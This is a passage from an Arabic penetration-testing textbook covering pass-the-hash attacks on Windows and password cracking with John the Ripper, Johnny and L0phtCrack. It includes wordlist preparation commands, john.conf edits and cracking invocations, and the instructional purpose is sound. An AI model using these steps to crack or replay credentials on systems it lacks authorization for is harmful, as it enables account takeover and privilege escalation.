‫او ﺑﻣﻌﻧﻰ اﺧر ان ھذا اﻟﮭﺟوم اﻟﻣﮭﺎﺟم ﻻ ﯾﻘوم ﺑﻣﺣﺎوﻟﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور وإﻧّﻣﺎ ﺗﻣرﯾرھﺎ‪ .‬ﺑﺎﺳﺗﺧدام ادوات ﺧﺎﺻﺔ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺣﻘن اﻟﮭﺎش‬
‫ﻓﻲ ذاﻛرة ‪ Local Security Authority Subsystem Service‬وﺑﻌد ذﻟك ﯾﻣﻛﻧﮫ اﺳﺗﺧدام اي ﺧدﻣﺔ او اداة ﻓﻲ اﻟوﯾﻧدوز ﺑﺻﻼﺣﯾﺎت‬
‫اﻟﻣﺳﺗﺧدم ﺻﺎﺣب اﻟﮭﺎش اﻟذي ﺣﺻل ﻋﻠﯾﮫ اﻟﻣﮭﺎﺟم‪ .‬ﺗزداد ﻓﻌﺎﻟﯾﺔ وﺧطورة اﻟﮭﺟوم ﻓﻲ ﺣﺎل ﻛون اﻟﮭﺎش ھو ﻟﻣدﯾر اﻟﻧّظﺎم‪.‬‬
‫اﻟﮭﺟوم ﻓﻲ اﻟوﻗت اﻟﺣﺎﻟﻲ ﯾﺳﺗﮭدف ﻧظﺎم وﯾﻧدوز وﻟﻛن ھذا ﻻ ﯾﻌﻧﻲ ان اﻻﻧظﻣﺔ اﻻﺧرى ﻓﻲ ﻣﺄﻣن ﻣن ھذا اﻟﮭﺟوم ﻓﺑداﯾﺗﮫ ﻛﺎﻧت ﻓﻲ ‪ 1997‬ﺿد‬
‫‪Samba‬ﻋﻠﻰ ﻧظﺎم اﻟﯾوﻧﻛس‪.‬‬

‫ﻋﻠﻰ اﻟرﻏم ﻣن أن ﺑﻌض ھذه اﻟﮭﺟﻣﺎت ﻟم ﺗﻌد ﺗﻌﻣل ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺣدﺛﺔ‪ .‬ﺣﯾث ﯾﺗم اﺻطﯾﺎد ﺑﻌض اﻵﻟﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ وﻣﻧﻌﮭﺎ‪ .‬وﺗﻌﯾﯾن‬
‫‪ NTLM2‬أو ‪ kerberos‬ﺗﺳﺗﺧدم ﻟﮭزﯾﻣﺔ ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت‪ .‬أﯾﺿﺎ ﻣﯾزة اﻟﺗﺣﻛم ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ‪ UAC‬ﻓﻲ وﯾﻧدوز ‪ 7‬اﻏﻠﻘت‬
‫اﻟﻛﺛﯾر ﻣن ھذه اﻟﮭﺟﻣﺎت وﻟﻛﻧﮭﺎ ﻣﺎ زاﻟت ﺗﻌﻣل ﺿد أﻧظﻣﺔ وﯾﻧدوز ‪ .XP‬ﻟﻛن إذا ﺗم ﺗﻌطﯾل ‪ ،UAC‬ﻛﻣﺎ ﺳﻧرى ﻻﺣﻘﺎ‪ ،‬ﻓﯾﻣﻛﻧﮭﺎ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪.‬‬

‫ﻟﻛﻧﮫ ﻻ ﯾزال ﻣن اﻟﻣﻔﯾد إﻟﻘﺎء ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﺗﻘﻧﯾﺎت ‪.Pass the Hash‬‬
‫‪Passing the Hash with Metasploit Psexec‬‬
‫‪ Psexec‬رﺑﻣﺎ ﻛﺎن واﺣدا ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ ‪ Pass the Hash‬ﻟﺳﻧوات ﻋده‪ .‬وﯾﺗم ﺗﻧﻔﯾذه ﻣن ﺧﻼل وﺟود ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة وﻧﺷطﺔ‬
‫ﻣن ﺧﻼل ‪ .Meterpreter‬ﺳوف ﯾﺷرح ﻻﺣﻘﺎ‪.‬‬
‫‪Passing the Hash Toolkit‬‬
‫ھﻲ ﻋﺑﺎره ﻋن ﻣﺟﻣوﻋﺔ أدوات ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﻻﺳﺗﺧدام اﻟﮭﺎش ﻷداء وظﺎﺋف ﻣﺧﺗﻠﻔﺔ‪ .‬وأﺿﯾف ﻣؤﺧرا إﻟﻰ‬
‫ﻛﺎﻟﻲ وﯾﻣﻛن ﻓﺗﺢ ﻣن اﻟﻘﺎﺋﻣﺔ‪:‬‬
‫‪Kali Linux/Password Attacks/Passing the Hash‬‬
‫ﯾﻣﻛﻧك اﺳﺗﺧدام اﻷواﻣر ﻟﻠﻘﯾﺎم ﺑﺑﻌض اﻷﻣور اﻟﻣﺛﯾرة ﻟﻼھﺗﻣﺎم ﺟدا‪ .‬ﻧﺣن ﻟن ﻧﻐطﻲ اﻷﻣر‪ ،‬وﻟﻛن اﻟﻛﺛﯾر ﻣﻧﮭم ﻗد ﺗﺑدو ﻣﺗﺷﺎﺑﮭﺔ ﻟﻣﺳﺗﺧدﻣﻲ‬
‫وﯾﻧدوز‪ .‬ﻣﺟرد اﺳﺗﺧدام اﻟﺗﻌﺑﯾر )‪ (--help‬وﺳﺗﺣﺻل ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣﺳﺎﻋدة ﻣن ﺧﯾﺎرات اﻟﻣﮭﻣﺔ وﯾﺳﺗﺧدم‪:‬‬

‫‪JTR (John the Ripper): King of the Password Crackers‬‬


‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول‬
‫اﻟﻰ ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬
‫إذا ﻛﻧت ﻧﺳﺗطﯾﻊ اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ ،‬ﻓﺎن ھﻧﺎك اﺣﺗﻣﺎﻻت ﺟﯾدة ﻣﻊ ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟوﻗت‪ ،JTR ،‬أداة ﻟﻛﺳر‬
‫ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﺣﯾث ﯾﻣﻛﻧﮫ اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪350‬‬

‫‪ John the Ripper‬ھﻲ اﻛﺛر اداه ﺷﻌﺑﯾﮫ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺳﺗﺧدﻣﺔ اﻟﯾوم‪ .‬ﺣﯾث ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭﺎ ﺑﻛﺳر أﻧواع‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش‪ John the Ripper .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻻﻛﺗﺷﺎف اﻟﺗﻠﻘﺎﺋﻲ ﻟﻣﻌظم‬
‫اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﻟﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻔﺿﻠون ﻣﺛل ھذه اﻷداة ﻷﻧﮭﺎ ﻗﺎﺑﻠﺔ ﻟﻠﺗﺧﺻﯾص‬
‫وﯾﻣﻛن اﻋدادھﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﺳرﯾﻊ ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪ John the Ripper‬ﯾﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬


‫‪ -‬ﺗﺣﺎول ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻣﻊ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس)‪. (Dictionary words‬‬
‫‪ -‬ﯾﻘوم ﺑﺈﺿﺎﻓﺔ ﺑﻌض اﻟﺣروف اﻷﺑﺟدﯾﺔ واﻟرﻗﻣﯾﺔ اﻟﻰ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس‪.‬‬
‫‪ -‬ﯾﺿﻊ ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﻣﻌﺎ‪.‬‬
‫‪ -‬ﯾﺿﯾف أﺣرف أﺑﺟدﯾﺔ ورﻗﻣﯾﺔ ﻟﺟﻣﻊ اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -‬ﺗﺷﻐﯾل اﻟﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﻣﻊ أﺣرف ﺧﺎﺻﺔ ﻣﺧﺗﻠطﺔ‪.‬‬
‫‪ -‬ﻋﻧد ﻓﺷل ﻛل ﻣﻣﺎ ﺳﺑﻖ‪ ،‬ﯾﺣﺎول ﺗﺷﻐﯾل اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪.(brute-force‬‬

‫ﻋﻧد اﺳﺗﺧدام ھذه اﻷداة ﻓﺎن اول ﺷﻲء ﺗﻔﻌﻠﮫ ھو ﺗﺣدﯾث اﻟﻘﺎﻣوس اﻻﻓﺗراﺿﻲ‪ .‬ﺣﯾث اﻧﻧﺎ وﺟدﻧﺎ ان ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ ﻣﺣدودة )ﺣواﻟﻲ‬
‫‪ 3115‬ﻛﻠﻣﺔ( وإﻧﮭﺎ ﻓﻲ ﻛﺛﯾر ﻣن اﻟﺣﺎﻻت ﻻ ﺗﻘوم ﺑﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺷﺎﺋﻌﺔ‪ .‬ﯾﻣﻛﻧك أن ﺗﺟد ﻣﻠﻔﺎت اﻟﻘواﻣﯾس ﻣن ﺧﻼل ﺑﺣث ﺟوﺟل‪ .‬ﻟﻠﺗﺣﻘﻖ‬
‫ﻣن ﺣﺟم ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺟدﯾدة‪ ،‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر ‪ ،word count‬ﺣﺎﻟﻣﺎ ﯾﺗم ﺗﺣﻣﯾل اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد اﻟﻧﺷط‪ .‬ﻧﻘوم ﺑﺎﺳﺗﺧدام‬
‫ھذا اﻷﻣر ‪.wc –l FILNAME‬‬
‫ﻣن اﻟﺷﺎﺋﻊ أن ﯾﻛون ھﻧﺎك ﻋﺑﺎرات ﻣﻛررة ﻋﻧد اﻟﺗﺣﻣﯾل واﻟﺟﻣﻊ ﺑﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﻣﺗﻌددة ﻣن اﻹﻧﺗرﻧت‪ .‬ﻣن اﻟﻣﺳﺗﺣﺳن إزاﻟﺔ ھذه اﻟﺗﻛرارات‬
‫وﻛذﻟك اﻷﺣرف اﻟﻛﺑﯾرة ﺣﯾث ﯾﻘوم ‪ JTR‬ﺑﺗﺑدﯾل أﻧﻣﺎط اﻟﺣروف ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫‪ -‬ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﻛﻠﻣﺎت اﻟﻛﺑﯾرة ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#tr©A-Z©a-z©<©Word_File©>©All_Lower_Case_File‬‬
‫‪ -‬ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﺗﻛرارات ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#sort©-u©AllL_ower_Case_File©>©No_Duplicates_File‬‬

‫ﻟﻔﺗﺢ ‪ John the Ripper‬ﻓﻲ ﻛﺎﻟﻲ‪ ،‬ﻧذھب اﻟﻰ اﻻﺗﻲ‪:‬‬


‫‪Password Attacks | Offline Attacks | John‬‬

‫ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ‪ .‬ﻋﻠﯾﻧﺎ أوﻻ ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﮭﺎش‪ ،‬ﺛﺎﻧﯾﺎ‬
‫ﻧﺧﺗﺎر ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ‪ ،‬ﺛﺎﻟﺛﺎ ﻧﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟذي اﺧﺗرﻧﮭﺎ ﻣﻊ ﺧوارزﻣﯾﺔ اﻟﮭﺎش‪ ،‬وأﺧﯾرا ﻧﻘﺎرن ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺧﺗرﻧﺎھﺎ ﻣﻊ ﻣن‬
‫اﻟﮭﺎش اﻟﮭدف‪ .‬إذا ﺗطﺎﺑﻘﺎ‪ ،‬ﻓﻧﺣن ﻧﻌﻠم أﻧﮭﺎ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻌﺎدﯾﺔ ﻷﻧﮫ ﻻ ﯾوﺟد ﻧﺻﯾن ﻋﺎدﯾﯾن ﻣﺧﺗﻠﻔﯾن ﯾﻌطﯾﺎ ﻧﻔس اﻟﮭﺎش‪.‬‬
‫ﻋﻠﻰ اﻟرﻏم ﻣن أن ھذا ﻗد ﯾﺑدو وﻛﺄﻧﮭﺎ ﻋﻣﻠﯾﺔ ﺧرﻗﺎء‪ ،‬أو ﺑطﯾﺋﺔ ﻟﻺﻧﺳﺎن‪ ،‬ﻓﺄن اﻟﺣواﺳﯾب ﻣﺗﺧﺻﺻﺔ ﻓﻲ ﻣﮭﺎم ﻣﺛل ھذا‪ .‬ﻧظرا ﻟﻘوة اﻟﺣوﺳﺑﺔ‬
‫اﻟﻣﺗﺎﺣﺔ اﻟﯾوم‪ ،‬واﻟﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﻣن أرﺑﻊ اﻟﺧطوات اﻟﻣذﻛورة أﻋﻼه ھﻲ ﺗﺎﻓﮭﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻶﻻت اﻟﺣدﯾﺛﺔ‪ .‬اﻟﺳرﻋﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ‪ JTR‬ﻓﻲ ﺗوﻟد ھﺎش‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﺗﺧﺗﻠف ﺗﺑﻌﺎ ﻟﻠﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻹﻧﺷﺎء اﻟﮭﺎش واﻷﺟﮭزة اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾل ‪ JTR‬ﻋﻠﯾﮭﺎ‪ .‬ﻓﻣن اﻟﻣﺄﻣون اﻟﻘول إﻧﮫ ﺣﺗﻰ ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﻣﺗوﺳط ﻗﺎدر ﻋﻠﻰ ﺗوﻟﯾد اﻟﻣﻼﯾﯾن ﻣن ﺗﺧﻣﯾن ﻟﻛﻠﻣﺎت ﻣرور اﻟوﯾﻧدوز )‪ (LM‬ﻓﻲ ﻛل ﺛﺎﻧﯾﺔ‪ .‬ﯾﺗﺿﻣن ‪ JTR‬ﻣﯾزة أﻧﯾﻖ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك‬
‫ﻟﻘﯾﺎس أداء اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ .‬ﺳﯾﺗم ﻗﯾﺎس ھذا اﻟﻣﻌﯾﺎر ﻓﻲ )‪ .cracks per second (c/s‬ﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذا ﻋن طرﯾﻖ ﻓﺗﺢ اﻟﺗرﻣﻧﺎل ﻓﻲ‬
‫ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس وﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#john --test‬‬
‫ھذا ﺳوف ﯾوﻓر ﻟك ﻗﺎﺋﻣﺔ ﻣن ﻣﻘﺎﯾﯾس اﻷداء وﺗﺗﯾﺢ ﻟك ﻣﻌرﻓﺔ ﻣدى ﻛﻔﺎءة اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻓﻲ ﺗوﻟﯾد اﻟﺗﺧﻣﯾﻧﺎت اﻟﺗﻲ ﺗﺳﺗﻧد إﻟﻰ اﻷﺟﮭزة‬
‫اﻟﺧﺎﺻﺔ ﺑك واﻟﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻟﮭﺎش ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫ﻻﺳﺗﺧدام ﻣﻠف اﻟﻛﻠﻣﺎت اﻟﻣﺧﺻص ﻣﺛل اﻟﻣﻠف اﻟذي ﻗﻣت ﺑﺑﻧﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ واﻟذي ﯾﺳﻣﻰ ‪ ،No_Duplicates_File‬واﻟﺗﻲ ﺳوف‬
‫ﺗﺣﺗﺎﺟﮫ ﻟﺗﺣرﯾر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ‪ .‬وﯾﻣﻛن ﻓﻌل ھذا ﻣن ﺧﻼل ﺗﻌدﯾل اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﻣﻠف )‪.(/etc/john/john.conf‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪351‬‬

‫ﻓﻲ ھذا اﻟﻣﻠف‪ ،‬ﺳوف ﻧﺟد أﻧﮫ ﯾﺷﯾر اﻟﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت ‪ passwords.lst‬اﻓﺗراﺿﯾﺎ‪ .‬وﻟﺗﻐﯾﯾر ھذه اﻟﻼﺋﺣﺔ ﺑﻼﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ اﻋددﺗﮭﺎ ﺳﺎﺑﻘﺎ‬
‫ﻧﻘوم ﺑﺗﺑدﯾل اﻟﺳطر )‪ (Wordlist = $JOHN/password.lst‬اﻟﻰ )‪ .(Wordlist = No_Duplicates_File.lst‬ﺛﺎﻧﯾﺎ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت‬
‫اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ ‪ No_Duplicates_File.lst‬ﯾﺟب أن ﯾﻛون ﻣوﺟودة ﻓﻲ اﻟﻣﺟﻠد اﻟﻣﺣدد ﻓﻲ اﻟﻣﻠف ‪ .john.conf‬او ﯾﻣﻛن ذﻟك ﺑﺎﺳﺗﺧدام‬
‫اﻟﺗﻌﺑﯾر)‪ (--wordlist‬ﺛم ﻣﻛﺎن اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت‪ .‬ﻻﺳﺗﺧدام ‪ John the Ripper‬ﻋﻠﻰ ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر‪ ،‬ﻓﺳوف‬
‫ﻧﺣﺗﺎج أوﻻ إﻟﻰ ﻧﺳﺦ اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد ‪ john‬واﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر )‪ .(/root/.john/‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ John the Ripper‬ﻋﻠﻰ‬
‫طرﯾﻖ اﻻﺗﻲ‪.‬‬
‫‪#john©hash‬‬

‫ﻟرؤﯾﺔ ﻧﺳﺑﺔ ﺗﻘد ھذا اﻻﻣر ﻓﻲ ﻋﻣﻠﮫ ﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ ھذه اﻷداة ﻟﻠﻌﻣل ﻓﻲ ﺑﯾﺋﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز أو ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.openwall.com/‬‬
‫‪Johnny‬‬

‫‪ Johnny‬ھﻲ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻟﻠﺗطﺑﯾﻖ ‪ John the Ripper‬ذات اﻟﺷﻌﺑﯾﺔ اﻟﻛﺑﯾرة ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪.‬‬
‫وھﻲ ﻣﺛل إﺻدار ﺳطر اﻷواﻣر‪ Johnny ، John the Ripper‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮫ ﺑﺎﺗﺧﺎذ اﺟراءات ﻷﻧواع ﻣﺧﺗﻠﻔﺔ‬
‫ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش‪ Johnny .‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﻛﺷف اﻷﻟﻰ ﻟﻣﻌظم اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﻣﺷﻔرة‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﯾوﺟد ﺑﻌد اﻟﺗﺧﺻﯾﺻﺎت اﻟﻣﺗوﻓرة ﻓﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر ‪ John the Ripper‬ﻏﯾر ﻣﺗوﻓرة ﻓﻲ اﻟﺗطﺑﯾﻖ ‪ Johnny‬ﻟذﻟك ﯾﻔﺿل‬
‫اﺳﺗﺧدام ﻧﺳﺧﺔ ﺳر اﻷواﻣر‪.‬‬

‫ﻻﺳﺗﺧدام ‪ Johnny‬ﻧﺗﺑﻊ اﻻﺗﻲ‪:‬‬


‫‪Password Attacks | Offline Attacks and select Johnny‬‬
‫واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪352‬‬

‫ﻣن ﺧﻼل ھده اﻟﺷﺎﺷﺔ ﻣن ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق ‪ Open password file‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺿﺢ اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‬
‫اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره اﻟﻰ ﻛﻠﻣﺎت ﻣرور واﺿﺣﺔ‪.‬‬

‫ﻣن ﺧﻼل ھذا اﻟﺗطﺑﯾﻖ ﻧﻼﺣظ وﺟود ﺷرﯾط أدوات ﻗﺎﺋﻣﻲ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن ﻋﻧد اﻟﻧﻘر ﻓوق ‪ Options‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺣدد ﻧوﻋﮫ اﻟﮭﺟوم‬
‫ﻟﻛﺳر ھﺎش ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﻧﺗﺎﺋﺞ ھذا اﻟﺗطﺑﯾﻖ ﺗﺣﻣل ‪ %90‬ﻧﺗﺎﺋﺞ ﺻﺣﯾﺣﮫ‪.‬‬

‫ﻧﻼﺣظ ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ ‪ wordlist mode‬اﻧﮫ ﯾﻣﻛﻧك اﺧﺗﯾﺎر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗرﯾدھﺎ‪.‬‬

‫‪L0phtCrack‬‬
‫اﻟﻣﺻدر‪http://www.l0phtcrack.com :‬‬
‫‪ L0phtCrack‬ھﻲ أداة ﻣﺻﻣﻣﺔ ﻟﺗدﻗﯾﻖ ﻛﻠﻣﺔ اﻟﻣرور واﺳﺗﻌﺎدة اﻟﺗطﺑﯾﻘﺎت‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻔﻘودة ﻟﻣﺎﯾﻛروﺳوﻓت‬
‫وﯾﻧدوز ﺑﻣﺳﺎﻋدة ‪ ،rainbow table ،hybrid ،dictionary‬و‪ brute force attacks‬وﯾﺗم اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻗوة ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬اﻟﻌﯾوب اﻷﻣﻧﯾﺔ اﻟﺗﻲ ھﻲ ﻣﺗﺄﺻﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗوﺛﯾﻖ ﻟﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن ‪.L0phtCrack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪353‬‬

‫أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ ،‬اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ أﺳﺎس اﻟﺑروﺗوﻛول ‪ ،LAN Manager networking protocols‬ﺗﺳﺗﺧدم ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ اﻟذي‬
‫ﯾﺗﻛون ﻣن ‪ 8‬ﺑﺎﯾت ﻣن اﻟﺗوﺛﯾﻖ )‪ (challenge‬واﻟﺗﻲ ﺗﻘوم ﺑﺈرﺟﺎع ‪ 24‬ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ )‪ (response‬ﻋﺑر اﻟﺷﺑﻛﺔ ﻣن اﻟﻌﻣﯾل إﻟﻰ اﻟﺧﺎدم‬
